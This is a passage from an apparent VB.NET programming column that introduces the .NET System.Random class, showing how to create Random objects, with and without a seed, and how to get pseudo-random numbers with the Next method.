The third example creates a Random object, seeding the object from a time-related value and requests a number between 1 and 100, excluding the value 100.
Dim R As New Random(Now.Millisecond) R.Next(1, 100)
A simple Tic-Tac-Toe game is provided in the listing below, providing some more examples of using the Random class.
TicTacToe: Random Number Example
In keeping with the theme of this article, listing 1 contains a prototype of a Tic-Tac-Toe game (see figure). Just in case someone has forgotten, Tic-Tac-Toe is a simple game where players alternate turns, each player marking an empty square until all squares are marked or someone has three consecutive horizontal, vertical, or diagonal squares marked. If no player has three consecutive squares then the game is a Cats game.
The code is all implemented in a Windows application on a form. The computer player is as random as it can be (so everyone has a really good chance of winning).
Figure 1: Tic-Tac-Toe against a Random computer player.
Listing 1: Computer uses Random numbers to determine where to place "O".
1: Public Class Form1 2: Inherits System.Windows.Forms.Form 3: 4: [ Windows Form Designer generated code ] 5: 6: Private Sub Button2_Click(ByVal sender As System.Object, _ 7: ByVal e As System.EventArgs) Handles Button2.Click 8: Close() 9: End Sub 10: 11: Private Sub Initialize() 12: 13: Dim I As Integer 14: For I = 0 To Me.Controls.Count - 1 15: If (TypeOf Controls(I) Is Label) Then 16: Dim L As Label = Controls(I) 17: If (L.Tag <> Nothing) Then 18: L.Text = "" 19: Squares(L.Tag) = L 20: End If 21: End If 22: Next 23: 24: End Sub 25: 26: Private Random As System.Random 27: Private Turns As Integer = 0 28: Private Squares(8) As Label 29: Private UserTurn As Boolean = False 30: 31: Private Sub NewGame() 32: 33: Static UserFirst As Boolean = False 34: UserFirst = Not UserFirst 35: Initialize() 36: Random = New Random(Now.Millisecond) 37: Turns = 0 38: 39: If (UserFirst) Then 40: UserTurn = True 41: Else 42: UserTurn = False 43: ComputerTurn() 44: End If 45: End Sub 46: 47: Private Sub Button1_Click(ByVal sender As System.Object, _ 48: ByVal e As System.EventArgs) Handles Button1.Click 49: NewGame() 50: End Sub 51: 52: 53: Private Sub Form1_Load(ByVal sender As System.Object, _ 54: ByVal e As System.EventArgs) Handles MyBase.Load 55: 56: NewGame() 57: 58: End Sub 59: 60: Private Sub Label9_Click(ByVal sender As System.Object, _ 61: ByVal e As System.EventArgs) Handles Label1.Click, _ 62: Label2.Click, Label3.Click, Label4.Click, Label5.Click, _ 63: Label6.Click, Label7.Click, Label8.Click, Label9.Click 64: 65: If (Not UserTurn Or IsGameOver()) Then Exit Sub 66: 67: With CType(sender, Label) 68: If (.Text = "") Then 69: .Text = "X" 70: Turns += 1 71: 72: If (Not IsGameOver()) Then 73: UserTurn = False 74: ComputerTurn() 75: End If 76: Else 77: Beep() 78: End If 79: End With 80: 81: 82: End Sub 83: 84: Private Function TakeTurn(ByVal Turn As Integer) As Boolean 85: If (Squares(Turn).Text = "") Then 86: Squares(Turn).Text = "O" 87: Return True 88: Else 89: Return False 
90: End If 91: End Function 92: 93: Private Sub ComputerTurn() 94: Dim Turn As Integer = Random.Next(0, 9) 95: 96: While (True) 97: If (TakeTurn(Turn)) Then Exit While 98: Application.DoEvents() 99: Turn = Random.Next(1, 9) 100: End While 101: 102: Turns += 1 103: IsGameOver() 104: UserTurn = True 105: 106: End Sub 107: 108: Private Overloads Function SquaresEqual( _ 109: ByVal First As Integer, _ 110: ByVal Second As Integer, _ 111: ByVal Third As Integer) As Boolean 112: 113: Return Squares(First).Text = Squares(Second).Text _ 114: And Squares(Second).Text = Squares(Third).Text _ 115: And Squares(First).Text <> "" 116: 117: End Function 118: 119: Private Overloads Function SquaresEqual(ByVal First As Integer, _ 120: ByVal Second As Integer, ByVal Third As Integer, _ 121: ByRef Value As String) As Boolean 122: 123: 124: Dim Result As Boolean 125: Result = SquaresEqual(First, Second, Third) 126: 127: If (Result) Then 128: Value = Squares(First).Text 129: End If 130: 131: Return Result 132: End Function 133: 134: 135: Private Function IsWinner( _ 136: Optional ByRef Value As String = "") As Boolean 137: 138: Return SquaresEqual(0, 1, 2, Value) Or _ 139: SquaresEqual(0, 3, 6, Value) Or _ 140: SquaresEqual(0, 4, 8, Value) Or _ 141: SquaresEqual(1, 4, 7, Value) Or _ 142: SquaresEqual(2, 5, 8, Value) Or _ 143: SquaresEqual(2, 4, 6, Value) Or _ 144: SquaresEqual(3, 4, 5, Value) Or _ 145: SquaresEqual(6, 7, 8, Value) 146: 147: End Function 148: 149: Private Sub ScoreGame() 150: Dim Value As String = "" 151: If (IsWinner(Value)) Then 152: MsgBox(Value & " is the winner!") 153: Else 154: MsgBox("Cats Game!") 155: End If 156: End Sub 157: 158: Private Function IsGameOver() As Boolean 159: 160: If (Turns >= 9 Or IsWinner()) Then 161: ScoreGame() 162: Return True 163: Else 164: Return False 165: End If 166: 167: End Function 168: 169: End Class
Line 26 declares an uninitialized Random member named Random. Line 36 constructs a Random object, seeding with the number of milliseconds for the current time value, every time a new game is started. Line 94 requests a random number between 0 and 9, including 0 and excluding 9. This represents the 9 possible spaces on the Tic-Tac-Toe board. Line 94 is included in the ComputerTurn method. The computer tries random numbers between 0 and 9 until it finds an empty square to place it's O. After each player's turn the game checks to see if the game is over. If all squares are marked or a player has won then the game is scored..
There are no comments yet. Be the first to comment! | http://www.codeguru.com/columns/vb/article.php/c6555/Something-Fun-for-the-HolidaysmdashRandom-Numbers--Tic-Tac-Toe.htm | CC-MAIN-2015-11 | refinedweb | 1,228 | 63.39 |
.
In reality, I don’t often write components from scratch in a TDD way, however
I will often use TDD to replicate an existing bug in a component to first see
the bug in action, and then fixing it. Feedback via test results on the
command line is often much quicker than browser refreshes and manual
interactions, so writing tests can be a very productive way to improve or fix
a component’s behaviour.
Set up
I’ll be using a brand new React app for this tutorial, which I’ve created with
create-react-app. This
comes complete with Jest, a test runner
built and maintained by Facebook.
There’s one more dependency we’ll need for now –
Enzyme. Enzyme is a suite of test utilities
for testing React that makes it incredibly easy to render, search and make
assertions on your components, and we’ll use it extensively today. Enzyme also
needs react-test-renderer to be installed (it doesn’t have it as an explicit
dependency because it only needs it for apps using React 15.5 or above, which we
are). In addition, the newest version of Enzyme uses an adapter based system
where we have to install the adapter for our version of React. We’re rocking
React 16 so I’ll install the adapter too:
yarn add -D enzyme react-test-renderer enzyme-adapter-react-16
The -D argument tells Yarn to save these dependencies as developer
dependencies.
You can read more about
installing Enzyme in the docs.
Enzyme setup
You also need to perform a small amount of setup for Enzyme to configure it to
use the right adapter. This is all documented in the link above; but when we’re
working with an application created by create-react-app, all we have to do is
create the file src/setupTests.js. create-react-app is automatically
configured to run this file before any of our tests.
import { configure } from ‘enzyme’
import Adapter from ‘enzyme-adapter-react-16’
configure({ adapter: new Adapter() })
If you’re using an older version of React in your projects but still want to
use Enzyme, make sure you use the right Enzyme adapter for the version of
React you’re using. You can find more on the
Enzyme installation docs.
create-react-app is configured to run this file for us automatically when we run
yarn test, so before our tests are run it will be executed and set up Enzyme
correctly.
If you’re not using create-react-app, you can configure Jest yourself to run
this file using the
setupTestFrameworkScriptFile
configuration option.
The Hello component
Let’s build a component that takes a name prop and renders
Hello,
name!</p> onto the screen. As we’re writing tests first, I’ll create
src/Hello.test.js, following the convention for test files that
create-react-app uses (in your own apps you can use whichever convention you
prefer). Here’s our first test:
import React from ‘react’
import Hello from ‘./Hello’
import { shallow } from ‘enzyme’
it(‘renders’, () => {
const wrapper = shallow(<Hello name=”Jack" />)
expect(wrapper.find(‘p’).text()).toEqual(‘Hello, Jack!’)
})
We use Enzyme’s
shallow rendering API.
Shallow rendering will only render one level of components deep (that is, if our
Hello component rendered the Foo component, it would not be rendered). This
helps you test in isolation and should be your first point of call for testing
React components.
You can run yarn test in a React app to run it and have it rerun on changes.
If you do that now, you’ll see our first error:
Cannot find module ‘./Hello’ from ‘Hello.test.js’
So let’s at least define the component and give it a shell that renders nothing:
import React from ‘react’
const Hello = props => {
return null
}
export default Hello
Now we get a slightly cryptic error:
Method “text” is only meant to be run on a single node. 0 found instead.
Once you’ve used Enzyme a couple of times this becomes much clearer; this is
happening because we’re calling wrapper.find(‘p’) and then calling text() on
that to get the text, but the component is not rendering a paragraph. Let’s fix
that:
const Hello = props => {
return <p>Hello World</p>
}
Now we’re much closer!
expect(received).toEqual(expected)
Expected value to equal:
"Hello, Jack!"
Received:
"Hello World"
And we can make the final leap to a green test:
const Hello = props => {
return <p>Hello, {props.name}!</p>
}
Next up, let’s write a test to ensure that if we don’t pass in a name, it
defaults to “Unknown”. At this point I’ll also update our first test, because
it(‘renders’, …) is not very descriptive. It’s good to not care too much
about the name of the first test you write, and focus on the implementation, but
once you’re more comfortable with what you’re testing and beginning to expand
your test suite, you should make sure you keep things organised.
With our second test, we’re failing again:
it(‘renders the name given’, () => {…})
it(‘uses "Unknown" if no name is passed in’, () => {
const wrapper = shallow(<Hello />);
expect(wrapper.find(‘p’).text()).toEqual(‘Hello, Unknown!’);
});
expect(received).toEqual(expected)
Expected value to equal:
"Hello, Unknown!"
Received:
"Hello, !"
But we can now write our first pass at the implementation to fix it:
const Hello = props => {
return <p>Hello, {props.name || ‘Unknown’}!</p>
}
And now the test is green we’re free to refactor. The above is perfectly fine
but not the way it’s usually done in React. Some might choose to destructure the
props argument and give name a default value:
const Hello = ({ name = ‘Unknown’ }) => {
return <p>Hello, {name}!</p>
}
But most of the time when working with React components I’ll use the
defaultProps object to define the defaults. I’ll also set the component’s
propTypes:
import React from ‘react’
import PropTypes from ‘prop-types’
const Hello = props => {
return <p>Hello, {props.name}!</p>
}
Hello.propTypes = {
name: PropTypes.string,
}
Hello.defaultProps = {
name: ‘Unknown’,
}
export default Hello
And all our tests are still passing.
Conclusion
That brings our first look at testing React with Enzyme 3 to an end. In future
tutorials we’ll dive further into what Enzyme has to offer and see how we can
test components of increasing complexity.
Link: | https://jsobject.info/2017/12/12/an-introduction-to-testing-react-components-with-enzyme-3/ | CC-MAIN-2019-18 | refinedweb | 1,063 | 61.36 |
Editor's Note: This article has a followup in Advanced Subroutine Techniques.
A subroutine (or routine, function, procedure, macro, etc.) is, at its heart, a named chunk of work. It's shorthand that allows you to think about your problem in bigger chunks. Bigger chunks mean two things:
- You can break the problem up into smaller problems that you can solve independently.
- You can use these solutions to solve your overall problem with greater confidence.
Well-written subroutines will make your programs smaller (in lines and memory), faster (both in writing and executing), less buggy, and easier to modify.
You're Kidding, Right?
Consider this: when you lift your sandwich to take a bite, you don't think about all the work that goes into contracting your muscles and coordinating your movements so that the mayo doesn't end up in your hair. You, in essence, execute a series of subroutines that say "Lift the sandwich up to my mouth and take a bite of it, then put it back down on the plate." If you had to think about all of your muscle contractions and coordinating them every time you wanted to take a bite, you'd starve to death.
The same is true for your code. We write programs for a human's benefit. The computer doesn't care how complicated or simple your code is to read--it converts everything to the same 1s and 0s whether it has perfect indentation or is all on one line. Programming guidelines, and nearly every single programming language feature, exist for human benefit.
Tell Me More
Subroutines truly are the magical cure for all that ails your programs. When done right, you will find that you write your programs in half the time, you have more confidence in what you've written, and you can explain it to others more easily.
Naming
A subroutine provides a name for a series of steps. This is especially important when dealing with complicated processes (or algorithms). While this includes ivory-tower solutions such as the Schwartzian transform (for sorting), this also includes the overly complicated way your company does accounts receivables. By putting a name on it, you're making it easier to work with.
Code Reuse
Face it--you're going to need to do the same thing over and over in different parts of your code. If you have the same 30 lines of code in 40 places, it's much harder to apply a bugfix or a requirements change. Even better, if your code uses subroutines, it's much easier to optimize just that one little bit that's slowing the whole application down. Studies have shown that 80 percent of the application's runtime generally occurs within one percent of an application's code. If that one percent is in a few subroutines, you can optimize it and hide the nasty details from the rest of your code.
Testability
To many people, "test" is a four-letter word. I firmly believe this is because they don't have enough interfaces to test against. A subroutine provides a way of grabbing a section of your code and testing it independently of all the rest of your code. This independence is key to having confidence in your tests, both now and in the future.
In addition, when someone finds a bug, the bug will usually occur in a single subroutine. When this happens, you can alter that one subroutine, leaving the rest of the system unchanged. The fewer changes made to an application, the more confidence there is in the fix not introducing new bugs along with the bugfix.
Ease of Development
No one argues that subroutines are bad when there are ten developers working on a project. They allow different developers to work on different parts of the application in parallel. (If there are dependencies, one developer can stub the missing subroutines.) However, they provide an equal amount of benefit for the solo developer: they allow you to focus on one specific part of the application without having to build all of the pieces up together. You will be happy for the good names you chose when you have to read code you wrote six months ago.
Consider the following example of a convoluted conditional:
if ((($x > 3 && $x<12) || ($x>15 && $x<23)) && (($y<2260 && $y>2240) || ($z>foo_bar() && $z<bar_foo()))) {
It's very hard to tell exactly what's going on. Some judicious white space can help, as can improved layout. That leaves:
if ( ( ( $x > 3 && $x < 12) || ($x > 15 && $x < 23) ) && ( ($y < 2260 && $y > 2240) || ($z > foo_bar() && $z < bar_foo()) ) ) {
Gah, that's almost worse. Enter a subroutine to the rescue:
sub is_between {
    my ($value, $left, $right) = @_;
    return ( $left < $value && $value < $right );
}

if ( ( is_between( $x, 3, 12 ) || is_between( $x, 15, 23 ) )
  && ( is_between( $y, 2240, 2260 ) || is_between( $z, foo_bar(), bar_foo() ) ) ) {
That's so much easier to read. One thing to notice is that, in this case, the rewrite doesn't actually save any characters. In fact, this is slightly longer than the original version. Yet, it's easier to read, which makes it easier to both validate for correctness as well as to modify safely. (When writing this subroutine for the article, I actually found an error I had made--I had flipped the values for comparing $y so that the $y conditional could never be true.)
How Do I Know if I'm Doing It Right?
Just as there are good sandwiches (turkey club on dark rye) and bad sandwiches (peanut butter and banana on Wonder bread), there are also good and bad subroutines. While writing good subroutines is very much an art form, there are several characteristics you can look for when writing good subroutines. A good subroutine is readable and has a well-defined interface, strong internal cohesion, and loose external coupling.
Readability
The best subroutines are concise--usually 25-50 lines long, which is one or two average screens in height. (While your screen might be 110 lines high, you will one day have to debug your code on a VT100 terminal at 3 a.m. on a Sunday.)
Part of being readable also means that the code isn't overly indented. The guidelines for the Linux kernel code include a statement that all code should be less than 80 characters wide and that indentations should be eight characters wide. This is to discourage more than three levels of indentation. It's too hard to follow the logic flows with any more than that.
Well-Defined Interfaces
This means that you know all of the inputs and all of the outputs. Doing this allows you to muck with either side of this wall and, so long as you keep to the contract, you have a guarantee that the code on the other side of the interface will be safe from harm. This is also critical to good testing. By having a solid interface, you can write test suites to validate both the subroutine and to mock the subroutine to test the code that uses it.
Strong Internal Cohesion
Internal cohesion is about how strongly the lines of code within the subroutine relate to one another. Ideally, a subroutine does one thing and only one thing. This means that someone calling the subroutine can be confident that it will do only what they want to have done.
Loose External Coupling
This means that changes to code outside of the subroutine will not affect how the subroutine performs, and vice versa. This allows you to make changes within the subroutine safely. This is also known as having no side effects.
As an example, a loosely coupled subroutine should not access global variables unnecessarily. Proper scoping, using the my keyword, is critical for any variables you create in your subroutine.
This also means that a subroutine should be able to run without depending upon other subroutines to be run before or after it. In functional programming, this means that the function is stateless.
Perl has global special variables (such as $_, @_, $?, $@, and $!). If you modify them, be sure to localize them with the local keyword.
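As an illustrative sketch (the sub name here is mine, not from the article), here is the classic idiom of localizing the special variable $/ (Perl's input record separator) inside a sub, so the change cannot leak out:

```perl
sub slurp {
    my ($filehandle) = @_;
    local $/;             # undef the record separator for this sub only...
    return <$filehandle>; # ...so one read returns the entire file
}
# When slurp() returns, $/ is automatically restored to its old value.
```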
What Should I Call It?
Naming things well is important for all parts of your code. With subroutines, it's even more important. A subroutine is a chunk of work described to the reader only by its name. If the name is too short, no one knows what it means. If the name is too long, then it's too hard to understand and potentially difficult to type. If the name is too specific, you will confuse the reader when you call it for more general circumstances.
Subroutine names should flow when read out loud: doThis() for actions and is_that() for Boolean checks. Ideally, a subroutine name should be verbNoun() (or verb_noun()). To test this, take a section of your code and read it out loud to your closest non-geek friend. When you're done, ask them what that piece of code should do. If they have no idea, your subroutines (and variables) may have poor names. (I've provided examples in two forms, "camelCase" and "under_score." Some people prefer one way and some prefer the other. As long as you're consistent, it doesn't matter which you choose.)
What Else Can I Do?
(This section assumes a strong grasp of Perl fundamentals, especially hashes and references.)
Perl is one of a class of languages that allows you to treat subroutines as first-class objects. This means you can use subroutines in nearly every place you can use a variable. This concept comes from functional programming (FP), and is a very powerful technique.
The basic building block of FP in Perl is the reference to a subroutine, or subref. For a named subroutine, you can say my $subref = \&foobar;. You can then say $subref->(1, 2) and it will be as if you said foobar(1, 2). A subref is a regular scalar, so you can pass it around as you can any other reference (say, to an array or hash) and you can put them into arrays and hashes. You can also construct them anonymously by saying my $subref = sub { ... }; (where the ... is the body of the subroutine).
This provides several very neat options.
Closures
Closures are the main building blocks for using subroutines in functional programming. A closure is a subroutine that remembers its lexical scratchpad. In English, this means that if you take a reference to a subroutine that uses a my variable defined outside of it, it will remember the value of that variable when it was defined and be able to access it, even if you use the subroutine outside of the scope of that variable.
There are two main variations of closures you see in normal code. The first is a named closure.
{
    my $counter = 0;
    sub inc_counter { return $counter++ }
}
When you call inc_counter(), you're obviously out of scope for the $counter variable. Yet, it will increment the counter and return the value as if it were in scope.
This is a very good way to handle global state, if you're uncomfortable with object-oriented programming. Just extend the idea to multiple variables and have a getter and setter for each one.
The second is an anonymous closure.
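A minimal sketch of this pattern (my reconstruction, not the article's original example) is a factory that returns anonymous closures, each remembering its own private $count:

```perl
sub make_counter {
    my $count = 0;
    return sub { return $count++ };
}

my $first  = make_counter();
my $second = make_counter();

print $first->(), "\n";   # 0
print $first->(), "\n";   # 1
print $second->(), "\n";  # 0 - each closure gets its own $count
```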
Recursion
Many recursive functions are simple enough that they do not need to keep any state. Those that do are more complicated, especially if you want to be able to call the function more than once at a time. Enter anonymous subroutines.
sub recursionSetup {
    my ($x, $y) = @_;

    my @stack;
    my $_recurse = sub {
        my ($foo, $bar) = @_;
        # Do stuff here with $x, $y, and @stack;
    };

    my $val = $_recurse->( $x, $y );
    return $val;
}
Inner Subroutines
Subroutine definitions are global in Perl. This means that Perl doesn't have inner subroutines.
sub foo {
    sub bar {
    }

    # This bar() should only be accessible from within foo(),
    # but it is accessible from everywhere
    bar();
}
Enter anonymous subroutines again.
sub foo {
    my $bar = sub {
    };

    # This $bar is only accessible from within foo()
    $bar->();
}
Dispatch Tables
Often, you need to call a specific subroutine based on some user input. The first attempts to do this usually look like this:
if ( $input eq 'foo' ) {
    foo( @params );
}
elsif ( $input eq 'bar' ) {
    bar( @params );
}
else {
    die "Cannot find the subroutine '$input'\n";
}
Then, some enterprising soul learns about soft references and tries something like this:
&{ $input }( @params );
That's unsafe, because you don't know what $input will contain. You cannot guarantee anything about it, even with taint and all that jazz on. It's much safer just to use dispatch tables:
my %dispatch = (
    foo => sub { ... },
    bar => \&bar,
);

if ( exists $dispatch{ $input } ) {
    $dispatch{ $input }->( @params );
}
else {
    die "Cannot find the subroutine '$input'\n";
}
Adding and removing available subroutines is simpler than the if-elsif-else scenario, and this is much safer than the soft references scenario. It's the best of both worlds.
Subroutine Factories
Often, you will have many subroutines that look very similar. You might have accessors for an object that differ only in which attribute they access. Alternately, you might have a group of mathematical functions that differ only in the constants they use.
sub make_multiplier {
    my ($multiplier) = @_;
    return sub {
        my ($value) = @_;
        return $value * $multiplier;
    };
}

my $times_two  = make_multiplier( 2 );
my $times_four = make_multiplier( 4 );

print $times_two->( 6 ), "\n";
print $times_four->( 3 ), "\n";
----
12
12
Try that code and see what it does. You should see the values below the dotted line.
Conclusion
Subroutines are arguably the most powerful tool in a programmer's toolbox. They provide the ability to reuse sections of code, validate those sections, and create new algorithms that solve problems in novel ways. They will reduce the amount of time you spend programming, yet allow you to do more in that time. They will reduce the number of bugs in your code ten-fold, and allow other people to work with you while feeling safe about it. They truly are programming's super-tool. | http://www.perl.com/pub/2005/11/03/subroutines.html | CC-MAIN-2015-11 | refinedweb | 2,337 | 70.94 |
OData Connected Service 0.7.1 Release
Clément
We are pleased to announce a new release of OData Connected Service, version 0.7.1. This version adds the following important features and bug fixes:
- VB.NET support
- Option to include or exclude operation imports from generated code
- Ability to access the metadata endpoint behind a proxy
- Bug fixes and other improvements
You can get the extension from the Visual Studio Marketplace.
1. VB.NET Support
You can now use the OData Connected Service extension to generate OData client code for Visual Basic projects. The features supported in C# are also supported in VB.NET projects.
Let’s create a simple VB.NET project to demonstrate how it works. Open Visual Studio and create a VB .NET Core Console App.
When the new project is ready, right-click the project node in the Solution Explorer and then choose Add > Connected Service from the context menu that appears.
In the Connected Services tab, select OData Connected Service.
This loads the OData Connected Service configuration wizard. For this demo, we’ll keep things simple and stick to the default settings. For the service address, use the sample Trip Pin service endpoint:
Click Finish to start the client code generation process. After the process is complete, a Connected Services node is added to your project together with a child node named “OData Service”. Inside the folder you should see the generated Reference.vb file.
We’ll use the generated code to fetch a list of people from the service and display their names in the console.
Open the Program.vb file and replace its content with the following code:
Imports System
' this is the namespace that contains the generated code, based on the namespace defined in the service metadata
Imports OcsVbDemo.Microsoft.OData.SampleService.Models.TripPin

Module Program
    Sub Main(args As String())
        DisplayPeople().Wait()
    End Sub

    ''' <summary>
    ''' Fetches and displays a list of people from the OData service
    ''' </summary>
    ''' <returns></returns>
    Async Function DisplayPeople() As Task
        Dim container = New DefaultContainer(New Uri(""))
        Dim people = Await container.People.ExecuteAsync()

        For Each person In people
            Console.WriteLine(person.FirstName)
        Next
    End Function
End Module
The DefaultContainer is a generated class that inherits from DataServiceContext and gives us access to the resources exposed by the service. We create a Container instance using the URL of the service root. The container has a generated People property, which we'll use to execute a query against the People entity set on the OData service and then display the results.
Finally, let’s run the app. You should see a list of names displayed on the console:
2. Include/Exclude operation imports
This feature allows you to select the operations you want included in the generated code and exclude the ones you don’t want. This gives you more control and helps keep the generated code lean. There is more work being done in this area, and in an upcoming release, you will also have the option to exclude entity types that you don’t need.
This feature is available on the new Function/Action Imports page of the wizard.
In the example above, GetNearestAirport and ResetDataSource will be generated, but GetPersonWithMostFriends will not.
Here are some important things to keep in mind regarding this feature:
- It only covers operation imports (action and function imports), which are exposed directly on the entity container; it does not affect functions and actions accessible through entity types.
- When an operation import is excluded, all its overloads get excluded
- It is not supported for OData v3 services or lower.
3. Fetching service metadata behind a web proxy
Previously, when you used the connected service on a network that has a web proxy, the call to fetch service metadata would fail. To address this issue, we have provided a means for you to specify the web proxy configuration and credentials needed to access the network in such situations. These settings are not saved in the generated client, they are only used to fetch the metadata document during code generation. They are also not persisted or cached by default, meaning you would have to enter them each time you add or update a connected service.
You can specify the web proxy settings on the first page of the configuration wizard:
4. Bug fixes and minor improvements
- A bug was reported in the previous release that caused the connected service to fail if you provided a local file as the service address. This bug has been fixed
- We added a Browse button to make it easier to select local files
Stay tuned for the next release.
Special thanks to the following contributors:
- Chebotov Nickolay – VB support feature.
This is crazy – in a positive sense. Are you guys going to keep up this speed and start fixing what I remember to be the main reason to use simple.odata – missing features? Because it looks like you actually are getting serious with this client and I LOVE that part. Congratulations. Keep up that immense speed. Push updates as often as possible. This is what those of us using odata need.
Hey, as someone interested in using odata for the first time I’d be interested to know what someone with obvious experience considers to be ‘missing features’ to help me understand the landscape, especially with graphql becoming quite popular. Thanks! | https://devblogs.microsoft.com/odata/odata-connected-service-0-7-1-release/ | CC-MAIN-2020-50 | refinedweb | 891 | 54.12 |
I wanted to create an easy way to setup a Settings (options) dialog box similar to the Options box of Visual Studio when you go to Tools > Options. There were a few requirements I wanted to include like, reusability, handling many data types, categories, sorting and spaces in the names. For complete explanation of the code described in this article, please download the source code and read the comments. Each function/subroutine is fully commented, as well as has the new XML comments (new for VB) for each one (no XML comments are on control handlers).
12/12/2005 - I'd like to thank Peter Spiegler for sending me the code to support system-defined enumerations.
The great part about this dialog box is that it reads all the settings from the My.Settings namespace, which means you can create/edit your default settings directly from the IDE designer. You can do this by going to Project > {name} Properties... and then going to the Settings page.
There are a few rules that are imposed on your settings in order for them to show up in the dialog box:
The underscore is required so that it can separate the actual name of your setting from the category you wish to put it in. See the screenshot below for some examples:
You'll notice several settings in the screenshot have double underscores in their names. This was to allow spaces in either the category name or in the setting name itself. You'll also notice that all the names in the screenshot have a number after them. This is for the settings sort index within its own category. The setting needs to have a scope of user, not application. When a setting has a scope of application - it is readonly at runtime, and since we want to change these settings at runtime it must have a scope of user.
There are several data types that are supported by the IDE's Settings Designer, but it is a little more difficult to support data types such as a TimeSpan or a GUID. While a TextBox could provide support for editing these, I didn't want to mess with the validation, and the use of these as User scoped objects that you'd want to change in an Options dialog, I felt, was rare. The list of supported types:
Byte
Char
Decimal
Double
Integer
Long
SByte
Short
Single
String
UInteger
ULong
UShort
Using the form is like using any other form. Declare an instance of it and use the ShowDialog method. There are several different styles to choose from - see below for more details on them.

Dim f As New frmOptions
f.Style = frmOptions.OptionsStyle.FireFox2
f.ShowDialog(Me)
There are four different styles that you can use. TreeView and TabPages aren't anything new, but since 12/12/2005 I've included support for FireFox1 and FireFox2. FireFox1 is the style of the options box in FireFox before version 1.5 came out. FireFox2 is the style of FireFox version 1.5. Just by changing that one line of code (f.Style = frmOptions.OptionsStyle.FireFox2) you can change the look of the dialog box. Watch out when using the TreeView style, as it can be confusing for non-technical users (which most likely make up a majority of your user base - thanks Anna). For the FireFox styles, you can also add images. Currently these images must be 32x32 for the control's width/height support; however, feel free to modify the code to support other sizes. Here is an example from the downloadable source:
Dim f As New frmOptions
'f.OptionStyle = frmOptions.OptionsStyle.FireFox1
f.Style = frmOptions.OptionsStyle.FireFox2
'f.OptionStyle = frmOptions.OptionsStyle.TabPages
'f.OptionStyle = frmOptions.OptionsStyle.TreeView
f.ImageAdd("Database", My.Resources.database)
f.ImageAdd("Misc", My.Resources.ClockFace)
f.ImageAdd("Fonts", My.Resources.fonts)
f.ImageAdd("Colors", My.Resources.circles)
f.ImageAdd("COM", My.Resources.rotary_phone)
f.ShowDialog(Me)
ImageAdd allows you to add the images. Here I have all my images loaded as resources so that I can easily reference them. You must specify the main group that each image ties to as you add them, or they will not show up.
TreeView
TabPages
FireFox1
FireFox2
The form is relatively simple. I have a TreeView anchored on the left with a TableLayoutPanel anchored on the right. These serve as the housing for the settings. One note about the TreeView - the path separator is a period. There is also a checkbox, so that the users can choose whether they want to save their settings when the application exits or not, as well as the standard "OK", "Cancel" and "Apply" dialog buttons.
In order to be able to change the settings, but not apply them (hence the Apply and OK buttons), we need to have a storage spot for all our setting information. So, I created a class with a collection to store that information for us - SettingInfo and SettingInfoCollection. Each object of SettingInfo needs to store the Name, Category, SortIndex, and Value. There is a subroutine in the class that will load all these when called, passing it the true setting name (what you see in the designer). The collection should return to us all the settings of a given category, and change a value (or even a full item for sorting) for a given Index or true name.
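The complete classes ship with the article's download; as a rough sketch (the member names come from the description above, everything else is assumed), SettingInfo could look something like this:

```vb
Public Class SettingInfo
    Public TrueName As String   ' The real setting name used by My.Settings
    Public Name As String       ' Display name, with double underscores as spaces
    Public Category As String   ' Category path for the TreeView
    Public SortIndex As Integer ' Sort order within the category
    Public Value As Object      ' The edited (but not yet applied) value

    ''' <summary>Fill the fields from the true setting name.</summary>
    Public Sub LoadData(ByVal theTrueName As String)
        TrueName = theTrueName
        Value = My.Settings.Item(theTrueName)
        ' ...parse theTrueName to split out Category, Name and SortIndex
    End Sub
End Class
```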
In the Load event of the form, we need to load all the settings available to us. To do that, we need to cycle through each SettingsProperty in My.Settings.Properties, adding each one to the collection:
'Load the SaveOnExit value
chkSaveOnExit.Checked = My.Application.SaveMySettingsOnExit

'Setup the Setting property object for grabbing all the settings
Dim sp As System.Configuration.SettingsProperty = Nothing

'Cycle through each setting and add it if appropriate.
For Each sp In My.Settings.Properties
    'If the name doesn't have an underscore - we can't
    'assign a category so we can't change it.
    'If the setting is ApplicationScoped - we aren't
    'able to change it at runtime.
    'Check also if there is support on this form for
    'the System.Type the setting is.
    If sp.Name.IndexOf("_") <> -1 AndAlso _
        IsUserScope(sp) AndAlso IsAllowedType(sp) Then

        'Passed the tests create a new SettingInfo object
        Dim newSetting As New SettingInfo
        'Load the settings data into the object
        newSetting.LoadData(sp.Name)
        'Add the object to the collection
        Settings.Add(newSetting)
    End If
Next

'Sort the settings by category - makes the
'TreeView look nice
quickSort(Settings)

'Load the settings into the TreeView
LoadTreeView()
To load the categories into the TreeView (see the LoadTreeView() method), I have a function that adds the categories/sub-categories from an array.
After a category is selected from the TreeView - which should happen when you first display the form - the controls need to be displayed. The TreeView was an optimal control for displaying the categories because of the FullPath property of the nodes. So, in order to get all the settings of the selected category, we just use the function provided in the class:
'Get all the settings that match this category
Dim sets() As SettingInfo = _
    Settings.GetByCategory(tvCategories.SelectedNode.FullPath)
From here, I cycle through all the settings returned to me and determine the appropriate control to use for editing, adding handlers to each control's LostFocus event to update the value stored in the collection.
Applying the settings is very easy - just loop through each setting in the collection and update the value stored in the My.Settings namespace:
'Cycle through each setting that we could edit and
'update the real setting contained in the My namespace
For Each si As SettingInfo In Settings
    My.Settings.Item(si.TrueName) = si.Value
Next

'Update the SaveOnExit value
My.Application.SaveMySettingsOnExit = chkSaveOnExit.Checked
Hitting either the OK or Apply button will trigger the code given above. Apply will not close the dialog box. OK sets the DialogResult to OK and is the Accept button of the form. Cancel is the Cancel button of the form and will set DialogResult to CANCEL.
During runtime, if you've unchecked the save settings on the exit checkbox, the settings will apply correctly when you change them, but after you restart the application they will again be at their defaults. Leaving it checked will ensure that the settings you've changed are carried on to the next run of the program.
I really hate writing conclusions. I'll let you, the readers, come to your own conclusion about this code. I hope you find this helpful and easy to use. Feel free to send any comments/suggestions/bug reports to codeproject@stdominion.net or just leave a message below.
The Wizard - Part 1
Making a Sprite move around the Screen
This is the first in a four part series to show you how to add some movement and action to your sprite. This first part will go over the basics of getting keyboard input from the player and using it to make the Sprite move around the screen.

To begin, add the new sprite image that we are going to be using in this tutorial to the game project. You can download the Wizard image used in the project from here. Once you have downloaded the image, add the new Wizard image to the Content folder in your game.

Next, we need to make some enhancements to the Sprite class. These enhancements were made in the "Advanced Scrolling a 2D Background" project, but we will go over them now.
To begin, start by adding the following objects to the top of the Sprite class.
//The asset name for the Sprite's Texture
public string AssetName;
//The Size of the Sprite (with scale applied)
public Rectangle Size;
